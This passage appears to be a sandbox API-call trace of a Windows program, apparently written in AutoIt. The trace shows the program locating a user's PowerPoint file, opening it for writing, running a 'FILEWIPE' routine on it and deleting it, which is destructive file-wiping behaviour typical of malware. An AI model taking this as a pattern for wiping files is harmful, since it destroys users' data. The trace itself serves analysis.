cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.507] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.507] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.507] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.509] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.509] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0xb484a880, ftLastWriteTime.dwHighDateTime=0x1d5bad9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0x7c2100 [0035.509] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.509] CharLowerBuffW (in: lpsz="byte[67304]", cchLength=0xb | out: lpsz="byte[67304]") returned 0xb [0035.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.509] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.510] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.510] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.510] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.510] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.511] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.511] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.511] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.529] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.529] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\146rtg30pal-lzim9l_.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.529] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.530] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.530] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.531] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.531] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.531] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.531] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.531] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.532] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFilePart=0x0) returned 0x66 [0035.532] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0x14e380c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0x7c2100 [0035.532] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\146rtg30pal-lzim9l_.ppt")) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0x14e380c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0 [0035.534] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.534] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.534] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.534] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.534] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.534] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) 